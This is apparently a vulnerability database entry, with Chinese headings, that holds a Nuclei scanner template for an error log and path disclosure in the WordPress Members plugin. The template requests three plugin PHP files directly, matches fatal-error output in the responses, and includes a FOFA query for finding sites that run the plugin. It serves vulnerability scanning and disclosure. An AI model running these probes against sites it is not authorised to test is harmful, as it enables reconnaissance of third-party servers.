漏洞描述
WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files.
wp-members-error-log-disclosure: WordPress Members / Membership & User Role Editor Plugin - Error Log Disclosure
PoC代码[已公开]
id: wp-members-error-log-disclosure
info:
name: WordPress Members / Membership & User Role Editor Plugin - Error Log Disclosure
author: ritikchaddha
severity: low
description: |
WordPress Members plugin is vulnerable to error log disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/members/
metadata:
verified: true
max-request: 3
vendor: developer
product: members
framework: wordpress
fofa-query: body="/wp-content/plugins/members/"
tags: wp,wordpress,wp-plugin,fpd,members,exposure,error-log
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/members/admin/class-role-edit.php"
- "{{BaseURL}}/wp-content/plugins/members/admin/class-role-new.php"
- "{{BaseURL}}/wp-content/plugins/members/inc/class-role.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "wp-db")'
- 'contains_any(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 490a0046304402207e1f8e5318631ad1a197958deac371ac5272543eac8e8752127d57b45d917d1a02203eb9da022d93975485c331696449bd6544c4ebe107f567cddc46f7474137b3f7:922c64590222798bb761d5b6d8e72950